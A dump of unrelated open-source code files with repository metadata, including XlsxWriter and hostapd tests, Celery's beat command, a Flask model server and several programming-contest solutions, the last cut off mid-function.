| 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 |
NOASSERTION
| 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null |
UTF-8
|
Python
| false | false | 1,149 |
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('image01.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with image(s)."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.insert_image('E9', self.image_dir + 'red.png')
workbook.close()
self.assertExcelEqual()
def test_create_file_in_memory(self):
"""Test the creation of a simple XlsxWriter file with image(s)."""
workbook = Workbook(self.got_filename, {'in_memory': True})
worksheet = workbook.add_worksheet()
worksheet.insert_image('E9', self.image_dir + 'red.png')
workbook.close()
self.assertExcelEqual()
|
[
"[email protected]"
] | |
82e5f74cb9e4d564e4c9db40175c77111f664934
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5630113748090880_1/Python/Hichamdz38/b.py
|
ec503006a405070048db8b02218200889a3eaef9
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 309 |
py
|
import numpy as np
for i in xrange(1,input()+1):
N=input()
z=np.array(N**2*2-N)
SS=[]
for j in xrange(N*2-1):
S=map(int,raw_input().split())
SS.extend(S)
f=[]
for j in SS:
if SS.count(j)%2!=0:
if j not in f:
f.append(j)
f.sort()
print "Case #{}:".format(i),
for j in f:
print j,
print
|
[
"[email protected]"
] | |
b9be26523a79e0ed4ebc0819a2cf4003d2b1ee59
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02838/s053367568.py
|
d3c49f223dc225bd9cca1700aa01ef3296ab9707
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,631 |
py
|
# coding: utf-8
import sys
#from operator import itemgetter
sysread = sys.stdin.buffer.readline
read = sys.stdin.buffer.read
#from heapq import heappop, heappush
#from collections import defaultdict
sys.setrecursionlimit(10**7)
#import math
#from itertools import product, accumulate, combinations, product
#import bisect
#import numpy as np
#from copy import deepcopy
#from collections import deque
#from decimal import Decimal
#from numba import jit
INF = 1 << 50
EPS = 1e-8
mod = 10 ** 9 + 7
def mapline(t = int):
return map(t, sysread().split())
def mapread(t = int):
return map(t, read().split())
def generate_inv(n,mod):
"""
    Table of modular inverses for 1..n.
    n >= 2
    Note: mod must be a prime number
"""
ret = [0, 1]
for i in range(2,n+1):
next = -ret[mod%i] * (mod // i)
next %= mod
ret.append(next)
return ret
def run():
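    # Pairwise XOR sum: a + b == (a ^ b) + 2 * (a & b), so
    # sum_{i<j} (a_i ^ a_j) = (sum over ordered pairs of (a_i + a_j)
    # minus 2 * the AND sums) / 2; the AND part is computed bit by bit
    # from the per-bit totals in subs[].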
N, *A = mapread()
maxA = max(A)
L = maxA.bit_length()
subs = [0] * L
for k in range(L):
sum = 0
for a in A:
if (a >> k) & 1:
sum += 1 << k
sum %= mod
subs[k] = sum
sumA = 0
for a in A:
sumA += a
sumA %= mod
ret = 0
ret += (sumA * N) % mod
ret += (sumA * N) % mod
sub_sum = 0
for a in A:
sums = 0
for k in range(L):
if (a >> k) & 1:
sums += subs[k] * 2
sums %= mod
sub_sum += sums
sub_sum %= mod
ret -= sub_sum
ret %= mod
inv = generate_inv(2, mod)
ret *= inv[2]
ret %= mod
print(ret)
if __name__ == "__main__":
run()
|
[
"[email protected]"
] | |
4fd3ad15ddd33c92cdffecb72052595b15ddd601
|
4beabdb5089e3284251dcaf046366c35d3afe02f
|
/rectangles.py
|
06768e5dd0cb13903384183826b1e5920a411701
|
[] |
no_license
|
AndrewFendrich/Mandelbrot
|
c3fa2b1463d6e01b91ac0a3c53ef88c8e1716641
|
074ebd9028c13a9f840c2436ab2c8c3d2275dbf6
|
refs/heads/master
| 2021-01-13T00:52:24.060863 | 2017-05-08T14:30:02 | 2017-05-08T14:30:02 | 50,623,517 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 212 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 27 23:25:48 2015
@author: User
"""
import pygame
pygame.init()
rectangle = pygame.Rect(50,50,100,100)
print(rectangle)
rectangle.inflate_ip(2,2)
print(rectangle)
|
[
"[email protected]"
] | |
80a1c18f8e69671ebde216c7d4f3665ff8b2181b
|
b281dd9e711d737579745914c6611d8cfaddb07d
|
/phones_media_files_demo/phones_media_files_demo/phones/migrations/0001_initial.py
|
c64a49f588e99ab5a1c3d237694ae76464f853d7
|
[
"MIT"
] |
permissive
|
Beshkov/Python-web-fundamentals
|
daf76f3765cb56e02bdaba8ea7df675990dd3885
|
6b0e9cc9725ea80a33c2ebde6e29f2ab585ab8d9
|
refs/heads/main
| 2023-08-03T07:04:22.238320 | 2021-09-12T18:57:36 | 2021-09-12T18:57:36 | 392,644,888 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 633 |
py
|
# Generated by Django 3.2.6 on 2021-08-06 20:25
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Phone',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('manufacturer', models.CharField(max_length=30)),
('model', models.CharField(max_length=15)),
('image', models.ImageField(blank=True, upload_to='phones')),
],
),
]
|
[
"[email protected]"
] | |
54b5f81c202a4a9d48f25271d4ba743e2e4d049f
|
4015e9d9cc72889b3494ae8b58e81dc507ae8d31
|
/venv/Lib/site-packages/celery/bin/beat.py
|
faddd256a6bad3001f11a3074518b1a34db1463b
|
[] |
no_license
|
Unlimit78/Test_For_DevelopsToday
|
675676d3a477f590485722019bc1b1e1412b3926
|
dc4e4ae887edf243adaca3a03c5fd3209ee60300
|
refs/heads/master
| 2022-12-17T18:41:33.511674 | 2020-09-15T18:13:53 | 2020-09-15T18:13:53 | 295,706,782 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,625 |
py
|
# -*- coding: utf-8 -*-
"""The :program:`celery beat` command.
.. program:: celery beat
.. seealso::
See :ref:`preload-options` and :ref:`daemon-options`.
.. cmdoption:: --detach
Detach and run in the background as a daemon.
.. cmdoption:: -s, --schedule
Path to the schedule database. Defaults to `celerybeat-schedule`.
The extension '.db' may be appended to the filename.
Default is {default}.
.. cmdoption:: -S, --scheduler
Scheduler class to use.
Default is :class:`{default}`.
.. cmdoption:: --max-interval
Max seconds to sleep between schedule iterations.
.. cmdoption:: -f, --logfile
Path to log file. If no logfile is specified, `stderr` is used.
.. cmdoption:: -l, --loglevel
Logging level, choose between `DEBUG`, `INFO`, `WARNING`,
`ERROR`, `CRITICAL`, or `FATAL`.
.. cmdoption:: --pidfile
File used to store the process pid. Defaults to `celerybeat.pid`.
The program won't start if this file already exists
and the pid is still alive.
.. cmdoption:: --uid
User id, or user name of the user to run as after detaching.
.. cmdoption:: --gid
Group id, or group name of the main group to change to after
detaching.
.. cmdoption:: --umask
Effective umask (in octal) of the process after detaching. Inherits
the umask of the parent process by default.
.. cmdoption:: --workdir
Optional directory to change to after detaching.
.. cmdoption:: --executable
Executable to use for the detached process.
"""
from __future__ import absolute_import, unicode_literals
from functools import partial
from celery.bin.base import Command, daemon_options
from celery.platforms import detached, maybe_drop_privileges
__all__ = ("beat",)
HELP = __doc__
class beat(Command):
"""Start the beat periodic task scheduler.
Examples:
.. code-block:: console
$ celery beat -l info
$ celery beat -s /var/run/celery/beat-schedule --detach
$ celery beat -S django
The last example requires the :pypi:`django-celery-beat` extension
package found on PyPI.
"""
doc = HELP
enable_config_from_cmdline = True
supports_args = False
def run(
self,
detach=False,
logfile=None,
pidfile=None,
uid=None,
gid=None,
umask=None,
workdir=None,
**kwargs
):
if not detach:
maybe_drop_privileges(uid=uid, gid=gid)
kwargs.pop("app", None)
beat = partial(self.app.Beat, logfile=logfile, pidfile=pidfile, **kwargs)
if detach:
with detached(logfile, pidfile, uid, gid, umask, workdir):
return beat().run()
else:
return beat().run()
def add_arguments(self, parser):
c = self.app.conf
bopts = parser.add_argument_group("Beat Options")
bopts.add_argument("--detach", action="store_true", default=False)
bopts.add_argument("-s", "--schedule", default=c.beat_schedule_filename)
bopts.add_argument("--max-interval", type=float)
bopts.add_argument("-S", "--scheduler", default=c.beat_scheduler)
bopts.add_argument("-l", "--loglevel", default="WARN")
daemon_options(parser, default_pidfile="celerybeat.pid")
user_options = self.app.user_options["beat"]
if user_options:
uopts = parser.add_argument_group("User Options")
self.add_compat_options(uopts, user_options)
def main(app=None):
beat(app=app).execute_from_commandline()
if __name__ == "__main__": # pragma: no cover
main()
|
[
"[email protected]"
] | |
936b7b10e86cdeeaefe0e6f870ba20839b804f3d
|
04a0614b8c2a893dab29bc4ffb0aaf82364fdf3f
|
/53. Maximum Subarray.py
|
2fd8f5e141461dfc091e452ab1ffef6fc179a75e
|
[] |
no_license
|
sharmaji27/Leetcode-Problems
|
716bcb4a36b9e4f45274c4d551967e15c40ddbd2
|
0f878933b17df170c18f0b67b7200cec76c276e0
|
refs/heads/master
| 2021-10-20T17:35:35.175757 | 2021-10-20T05:33:17 | 2021-10-20T05:33:17 | 218,299,755 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 367 |
py
|
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
        if len(nums)==1:
            return nums[0]
global_max = nums[0]
current_sum = nums[0]
for i in range(1,len(nums)):
current_sum = max(current_sum+nums[i],nums[i])
global_max = max(current_sum,global_max)
return global_max
|
[
"[email protected]"
] | |
fcfdfb2bf143fbabd9e7882777ff096eaec7745c
|
eeee18e2769766c550fb5e0948977a016b48e15a
|
/Creational/abstract-factory.py
|
72d108161a2fa85440dac2ece3f9d6bf79735986
|
[] |
no_license
|
MoeinGhbh/DesignPattern
|
19aff7bd09f4161d11af2662b1be7962fb692989
|
b543a5c4eaf9da1341f95e9c777310d4f25ddeaf
|
refs/heads/master
| 2022-11-18T17:49:56.101880 | 2020-07-22T07:54:23 | 2020-07-22T07:54:23 | 266,117,271 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,740 |
py
|
"""
Abstract Factory
Car => Benz, Bmw => Suv, Coupe
benz suv => gla, glc
bmw suv => x1, x2
benz coupe => cls, E-class
bmw coupe => m2, m4
"""
from abc import ABC,abstractclassmethod
class Car(ABC):
@abstractclassmethod
def call_suv(self):
pass
@abstractclassmethod
def call_coupe(self):
pass
#---------------------------------------------
class Benz(Car):
def call_suv(self):
return Gla()
def call_coupe(self):
return Cls()
#---------------------------------------------
class Bmw(Car):
def call_suv(self):
return X1()
def call_coupe(self):
return M2()
#---------------------------------------------
class SUV(ABC):
@abstractclassmethod
def create_suv(self):
pass
class Coupe(ABC):
@abstractclassmethod
def create_coupe(self):
pass
#------------------------------------------------
# Benz
class Gla(SUV):
def create_suv(self):
print("this is your Gla SUV Benz...")
class Cls(Coupe):
def create_coupe(self):
print("this is your cls coupe Benz...")
#---------------------------------------------------
# BMW
class X1(SUV):
def create_suv(self):
print("this is your X1 SUV BMW .... ")
class M2(Coupe):
def create_coupe(self):
print("this is your me coupe BMW ....")
#------------------------------------------------------
def client_suv_order(order):
suv = order.call_suv()
suv.create_suv()
def client_coupe_order(order):
coupe= order.call_coupe()
coupe.create_coupe()
#----------------------------------------------------------
client_coupe_order(Benz())
client_coupe_order(Bmw())
client_suv_order(Benz())
client_suv_order(Bmw())
|
[
"="
] |
=
|
99a2478cea3c8d541d34c24dfcb9bc4ca59b0605
|
73b8aba05ee1424f38a8598a9f1305185588075f
|
/0x04-python-more_data_structures/9-multiply_by_2.py
|
6a475a580fe3f50723c6e049968a98f01637a6dd
|
[] |
no_license
|
nicolasportela/holbertonschool-higher_level_programming
|
0d176c0e56f4f703c1e9a98b430fc6120f22f675
|
e1537b81f21118456e5cfa0e4ed89520b232adb6
|
refs/heads/master
| 2023-04-20T21:30:22.693434 | 2021-05-13T01:47:30 | 2021-05-13T01:47:30 | 319,397,633 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 153 |
py
|
#!/usr/bin/python3
def multiply_by_2(a_dictionary):
new_dic = {}
for k, v in a_dictionary.items():
new_dic[k] = v * 2
return new_dic
|
[
"[email protected]"
] | |
aa2ad8ba0ff14340d3d7d30cd9b8fb24c00f071c
|
6820e74ec72ed67f6b84a071cef9cfbc9830ad74
|
/plans/tasks.py
|
22acd6cb6cb911b7571adefb4585bd699ce306c6
|
[
"MIT"
] |
permissive
|
AppforallHQ/f5
|
96c15eaac3d7acc64e48d6741f26d78c9ef0d8cd
|
0a85a5516e15d278ce30d1f7f339398831974154
|
refs/heads/master
| 2020-06-30T17:00:46.646867 | 2016-11-21T11:41:59 | 2016-11-21T11:41:59 | 74,357,925 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,047 |
py
|
from celery import task
from django.utils import timezone
from datetime import timedelta
import requests
import json
class EndpointNotAvailabe(Exception):
pass
def call_external_endpoint_to_update_status(the_task, action, subscription):
payload = {"uuid": subscription.uuid,
"plan": subscription.plan.pk,
"activate": (action == "activate"),
}
response = requests.put(
subscription.plan.interaction_endpoint_url % payload,
data=json.dumps(payload))
if response.status_code != 200:
e = EndpointNotAvailabe()
raise the_task \
.retry(args=[subscription], exc=e)
else:
return True
@task
def send_invoice_notification(invoice, email_type, **kwargs):
    return  # notifications are disabled here; the code below is intentionally unreachable
import requests
payload = {
"invoice_payment_url": invoice.payment_url,
"email_type": email_type,
"uuid": invoice.subscription.uuid,
"plan": invoice.subscription.plan.pk,
}
mail_body_response = requests.post(
invoice.subscription.plan.mail_endpoint_url % payload,
data=json.dumps(payload))
params = json.loads(mail_body_response.text)
from .actions import send_mail
send_mail(invoice, params, email_type)
@task(default_retry_delay=3*60)
def activate_subscription(subscription, **kwargs):
pass#return call_external_endpoint_to_update_status(activate_subscription, "activate", subscription)
@task(default_retry_delay=3*60)
def deactivate_subscription(subscription, **kwargs):
return call_external_endpoint_to_update_status(deactivate_subscription, "deactivate", subscription)
@task
def send_preinvoice():
from plans.models import Subscription
# FIXME
for subscription in Subscription.objects.filter():
if subscription.due_date < timezone.now() + timedelta(days=subscription.plan.preinvoice_length) \
and subscription.status == Subscription.ACTIVE:
subscription.status = Subscription.PREINVOICE
subscription.full_clean()
subscription.save()
@task
def mark_subscriptions_as_overdue():
from plans.models import Subscription
# FIXME
for subscription in Subscription.objects.filter():
if subscription.due_date < timezone.now() and subscription.status == Subscription.PREINVOICE:
subscription.status = Subscription.OVERDUE
subscription.full_clean()
subscription.save()
@task
def end_gracetime_for_fucking_users():
from plans.models import Subscription
# FIXME
for subscription in Subscription.objects.filter():
if subscription.due_date + timedelta(days=subscription.plan.overdue_length) < timezone.now():
subscription.status = Subscription.DEACTIVE
subscription.full_clean()
subscription.save()
@task
def invalidate_invoices():
from plans.models import Invoice
# FIXME
for invoice in Invoice.objects.filter():
if invoice.expires_at < timezone.now():
invoice.mark_as_invalid()
|
[
"[email protected]"
] | |
753271955f78deae3afbada6c0d93276ade8e340
|
03bca281c8bb3ba69c3a01252cc7c9e35cd675bd
|
/django/DCC/dccApp/migrations/0001_initial.py
|
63c611642310e159928a36aac3c2066355be6090
|
[] |
no_license
|
satish15625/pythonwork
|
380fef04170064aef8aeb919a4e30f65db9a097f
|
12d776152689a84f1560d08f35987f8ca4ea3fb0
|
refs/heads/master
| 2023-07-07T15:12:48.355226 | 2021-08-13T06:33:13 | 2021-08-13T06:33:13 | 374,058,740 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 562 |
py
|
# Generated by Django 3.0.7 on 2020-12-15 12:25
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='UploadImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('image_Img', models.ImageField(upload_to='images/')),
],
),
]
|
[
"[email protected]"
] | |
4eec63edb5849bedfb3c1094f0944238a960f578
|
a81d84fdb57e1b90812fc5b5b523685ba5b663c0
|
/python/2021_04/Question0769.py
|
648c3a58f644d02e661df59e3decc996ad812c3d
|
[] |
no_license
|
KujouNozom/LeetCode
|
1919081001126924daa7549493a0823702631a37
|
4de1e601274de1336d669e41f732a8cb056880b9
|
refs/heads/master
| 2023-07-17T12:17:45.156451 | 2021-09-04T11:57:40 | 2021-09-04T11:57:40 | 268,075,373 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 516 |
py
|
# 769. Max Chunks To Make Sorted  [two pointers]
from typing import List
class Solution:
def maxChunksToSorted(self, arr: List[int]) -> int:
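        # LeetCode 769: arr is a permutation of 0..n-1 with n <= 10 (hence the
        # sentinel value 10); a chunk can end at `index` exactly when the values
        # seen since `start` are precisely start..index.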
min_value, max_value, start = 10, -1, 0
ans = 0
for index in range(len(arr)):
min_value = min(min_value, arr[index])
max_value = max(max_value, arr[index])
if min_value == start and max_value == index:
ans += 1
min_value, max_value, start = 10, -1, index + 1
return ans
|
[
"[email protected]"
] | |
8e902e4e628a8d138844e6ee81c87d0dc785a0b1
|
4674b8088ffdf55905d44995f08a0792a3e4cd5c
|
/tests/hwsim/test_monitor_interface.py
|
bfc9a1562ff2e5c9fb7ee4dc4b08dfa12334195f
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
vanhoefm/krackattacks-scripts
|
41daca791638a92aa4cfa68a582e46119037560e
|
4b78669686f74efe664c6543b1b5b1616b22f902
|
refs/heads/research
| 2022-10-29T20:21:11.512335 | 2022-10-16T18:44:41 | 2022-10-16T18:44:41 | 107,408,514 | 2,184 | 577 |
NOASSERTION
| 2021-07-06T12:43:49 | 2017-10-18T12:58:08 |
C
|
UTF-8
|
Python
| false | false | 3,271 |
py
|
# AP mode using the older monitor interface design
# Copyright (c) 2013, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
from remotehost import remote_compatible
import logging
logger = logging.getLogger()
import time
import hwsim_utils
import hostapd
from wpasupplicant import WpaSupplicant
def test_monitor_iface_open(dev, apdev):
"""Open connection using cfg80211 monitor interface on AP"""
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="use_monitor=1")
id = wpas.add_network()
wpas.set_network(id, "mode", "2")
wpas.set_network_quoted(id, "ssid", "monitor-iface")
wpas.set_network(id, "key_mgmt", "NONE")
wpas.set_network(id, "frequency", "2412")
wpas.connect_network(id)
dev[0].connect("monitor-iface", key_mgmt="NONE", scan_freq="2412")
def test_monitor_iface_wpa2_psk(dev, apdev):
"""WPA2-PSK connection using cfg80211 monitor interface on AP"""
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="use_monitor=1")
id = wpas.add_network()
wpas.set_network(id, "mode", "2")
wpas.set_network_quoted(id, "ssid", "monitor-iface-wpa2")
wpas.set_network(id, "proto", "WPA2")
wpas.set_network(id, "key_mgmt", "WPA-PSK")
wpas.set_network_quoted(id, "psk", "12345678")
wpas.set_network(id, "pairwise", "CCMP")
wpas.set_network(id, "group", "CCMP")
wpas.set_network(id, "frequency", "2412")
wpas.connect_network(id)
dev[0].connect("monitor-iface-wpa2", psk="12345678", scan_freq="2412")
def test_monitor_iface_multi_bss(dev, apdev):
"""AP mode mmonitor interface with hostapd multi-BSS setup"""
params = { "ssid": "monitor-iface", "driver_params": "use_monitor=1" }
hapd = hostapd.add_ap(apdev[0], params)
hostapd.add_bss(apdev[0], apdev[0]['ifname'] + '-2', 'bss-2.conf')
dev[0].connect("monitor-iface", key_mgmt="NONE", scan_freq="2412")
dev[1].connect("bss-2", key_mgmt="NONE", scan_freq="2412")
@remote_compatible
def test_monitor_iface_unknown_sta(dev, apdev):
"""AP mode monitor interface and Data frame from unknown STA"""
ssid = "monitor-iface-pmf"
passphrase = "12345678"
params = hostapd.wpa2_params(ssid=ssid, passphrase=passphrase)
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
params['driver_params'] = "use_monitor=1"
hapd = hostapd.add_ap(apdev[0], params)
bssid = apdev[0]['bssid']
addr = dev[0].p2p_interface_addr()
dev[0].connect(ssid, psk=passphrase, ieee80211w="2",
key_mgmt="WPA-PSK-SHA256", proto="WPA2",
scan_freq="2412")
dev[0].request("DROP_SA")
# This protected Deauth will be ignored by the STA
hapd.request("DEAUTHENTICATE " + addr)
# But the unprotected Deauth from TX frame-from-unassoc-STA will now be
# processed
dev[0].request("DATA_TEST_CONFIG 1")
dev[0].request("DATA_TEST_TX " + bssid + " " + addr + " 0")
dev[0].request("DATA_TEST_CONFIG 0")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=5)
if ev is None:
raise Exception("No disconnection")
dev[0].request("DISCONNECT")
|
[
"[email protected]"
] | |
efc0ff16e064e56e714719076065e0481806106e
|
951e433b25a25afeea4d9b45994a57e0a6044144
|
/LeetCode/Q187_HM_findRepeatedDnaSequences.py
|
4be93e56f1f5ce25527e7b244bc6bc2c45797d72
|
[] |
no_license
|
EricaEmmm/CodePython
|
7c401073e0a9b7cd15f9f4a553f0aa3db1a951a3
|
d52aa2a0bf71b5e7934ee7bff70d593a41b7e644
|
refs/heads/master
| 2020-05-31T14:00:34.266117 | 2019-09-22T09:48:23 | 2019-09-22T09:48:23 | 190,318,878 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,045 |
py
|
# Repeated DNA Sequences
# All DNA is composed of a series of nucleotides abbreviated as A, C, G and T, e.g. "ACGAATTCCG". When studying DNA, it can be useful to identify sequences that repeat within the molecule.
# Write a function to find all the 10-letter-long sequences (substrings) that occur more than once in a DNA molecule.
#
# Example:
# Input: s = "AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT"
# Output: ["AAAAACCCCC", "CCCCCAAAAA"]
class Solution(object):
def findRepeatedDnaSequences(self, s):
"""
:type s: str
:rtype: List[str]
"""
res = dict()
if len(s) < 10:
            return []  # keep the return type consistent (a list)
for i in range(len(s)-9):
tmp = s[i:i+10]
            res[tmp] = res.get(tmp,0) + 1  # get() returns the value for the key, or the default when the key is absent
return list([i for i in res.keys() if res[i] > 1])
if __name__ == '__main__':
s = Solution()
tmp = "AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT"
print(s.findRepeatedDnaSequences(tmp))
# st = "abc"
# t = [1,2,3]
# print(st[0:3])
|
[
"[email protected]"
] | |
6c172d1d135b205d3134c570b5fea04025c05ba2
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02578/s304732693.py
|
fd8ac3cded43971a72e3cf659d1486c121afa2f5
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 234 |
py
|
n = int(input())
input_line = input().split()
member = [int(input_line[i]) for i in range(n)]
stands = 0
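# Make the heights non-decreasing from front to back, counting the total
# number of unit steps that have to be added.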
for i in range(1,n):
stand = member[i-1] - member[i]
if stand > 0:
stands += stand
member[i] += stand
print(stands)
|
[
"[email protected]"
] | |
b594ea5d9c012feedfb6dd74228118ce0300906b
|
8d9318a33afc2c3b5ca8ac99fce0d8544478c94a
|
/Books/Casandra DB/opscenter-5.1.0/lib/py/html5lib/treebuilders/__init__.py
|
50c8deeb08c187d8b51fcfdcb742e414c6ee52ab
|
[] |
no_license
|
tushar239/git-large-repo
|
e30aa7b1894454bf00546312a3fb595f6dad0ed6
|
9ee51112596e5fc3a7ab2ea97a86ec6adc677162
|
refs/heads/master
| 2021-01-12T13:48:43.280111 | 2016-11-01T22:14:51 | 2016-11-01T22:14:51 | 69,609,373 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 129 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:b2a0b8030b4449b4e227ef389f48544f1136f27d0fc657128ee58812e529f7d3
size 4478
|
[
"[email protected]"
] | |
dda213c37af2f9c9c79342b1e51e552411080ec5
|
49ab501632b0a8336058406e7daa3afce6be6e93
|
/python_server/run_keras_server.py
|
14a25f5c8f258346bcedf3cf308c98eb4e1fbf53
|
[] |
no_license
|
CharlesFauman/meme_server
|
3ab73e9788b9fea26f6ea270563381515d4b0d47
|
75b0d6fc041c1e2b04e260e9eecbff160225a0f6
|
refs/heads/master
| 2020-03-25T08:58:32.780593 | 2018-08-05T19:24:58 | 2018-08-05T19:24:58 | 143,640,946 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,029 |
py
|
# USAGE
# Start the server:
# python run_keras_server.py
# Submit a request via cURL:
# curl -X POST -F [email protected] 'http://localhost:5000/predict'
# Submit a request via Python:
# python simple_request.py
# import the necessary packages
import numpy as np
from threading import Thread
import flask
import redis
import uuid
import time
import json
import sys
import io
# initialize constants used for server queuing
PROCESSING_QUEUE = "processing_queue"
BATCH_SIZE = 32
SERVER_SLEEP = 0.25
CLIENT_SLEEP = 0.25
# initialize our Flask application, Redis server, and Keras model
app = flask.Flask(__name__)
db = redis.StrictRedis(host="localhost", port=6379, db=0)
db.flushdb()
print("* Loading model...")
import meme_model as model
print("* Model loaded")
def classify_process():
    # continually poll for new inputs to classify
while True:
# attempt to grab a batch of inputs from the database, then
# initialize the input IDs and batch of inputs themselves
queue = db.lrange(PROCESSING_QUEUE, 0, BATCH_SIZE - 1)
inputIDs = []
batch = None
# loop over the queue
for q in queue:
# deserialize the object and obtain the input
q = json.loads(q)
input_ = model.preprocess_deserialize(q["input"])
# check to see if the batch list is None
if batch is None:
batch = input_
# otherwise, stack the data
else:
batch = np.vstack([batch, input_])
# update the list of input IDs
inputIDs.append(q["id"])
# check to see if we need to process the batch
if len(inputIDs) > 0:
# classify the batch
print("* Batch size: {}".format(batch.shape))
preds = model.process(batch)
preds = model.postprocess_serialize(preds)
# loop over the image IDs and their corresponding set of
# results from our model
for (inputID, result) in zip(inputIDs, preds):
db.set(inputID, json.dumps(result))
# remove the set of images from our queue
db.ltrim(PROCESSING_QUEUE, len(inputIDs), -1)
# sleep for a small amount
time.sleep(SERVER_SLEEP)
@app.route("/predict", methods=["POST"])
def predict():
# initialize the data dictionary that will be returned from the
# view
data = {"success": False}
print("predicting!")
# ensure an input was properly uploaded to our endpoint
if flask.request.method == "POST":
print("was post!")
input_form = None
input_files = None
if(flask.request.form.get("input")):
input_form = flask.request.form.get("input")
if(flask.request.files.get("input")):
input_files = flask.request.files.get("input").read()
if input_form or input_files:
input_ = model.preprocess_serialize(input_form, input_files)
# generate an ID for the classification then add the
# classification ID + input to the queue
k = str(uuid.uuid4())
d = {"id": k, "input": input_}
db.rpush(PROCESSING_QUEUE, json.dumps(d))
# keep looping until our model server returns the output
# predictions
while True:
# attempt to grab the output predictions
output = db.get(k)
# check to see if our model has classified the input
if output is not None:
# add the output predictions to our data
# dictionary so we can return it to the client
data["predictions"] = json.loads(output)
# delete the result from the database and break
# from the polling loop
db.delete(k)
break
# sleep for a small amount to give the model a chance
# to classify the input
time.sleep(CLIENT_SLEEP)
# indicate that the request was a success
data["success"] = True
# return the data dictionary as a JSON response
return flask.jsonify(data)
# if this is the main thread of execution first load the model and
# then start the server
if __name__ == "__main__":
    # run the function used to classify inputs in a *separate*
    # thread from the one used for the web server
print("* Starting model service...")
t = Thread(target=classify_process, args=())
t.daemon = True
t.start()
# start the web server
print("* Starting web service...")
app.run()
|
[
"[email protected]"
] | |
8f9536c2451f1c553693aed0b4015a05647789bf
|
4b95aeb2533f0a582cea2fb26d6177e94aabb21f
|
/2020/src/lobby_layout.py
|
3bba605d05757a8dc9695996a0304392f18ef81b
|
[] |
no_license
|
MarcoBurgos/advent_of_code
|
0d9984e0fa47f68e52ef0f5cdf7681e23767bd16
|
81ac54bfe200cc348efbe860bd95aae4270f03b7
|
refs/heads/main
| 2023-02-09T14:40:38.204271 | 2020-12-26T00:09:36 | 2020-12-26T00:09:36 | 317,739,393 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,687 |
py
|
import sys
from utils import read_and_load_input
VECTORS = {
'w' : (-4, 0),
'e' : ( 4, 0),
'nw': (-2, -3),
'ne': ( 2, -3),
'sw': (-2, 3),
'se': ( 2, 3),
}
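# Hex directions flattened onto an ordinary integer grid; the (±4, 0) / (±2, ±3)
# offsets keep every hex centre at a unique (x, y) pair.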
def parse(line):
result = []
while line:
stepLength = 1 if line[0] in ('e', 'w') else 2
result.append(line[:stepLength])
line = line[stepLength:]
return result
def walk(path):
x, y = 0, 0
for step in path:
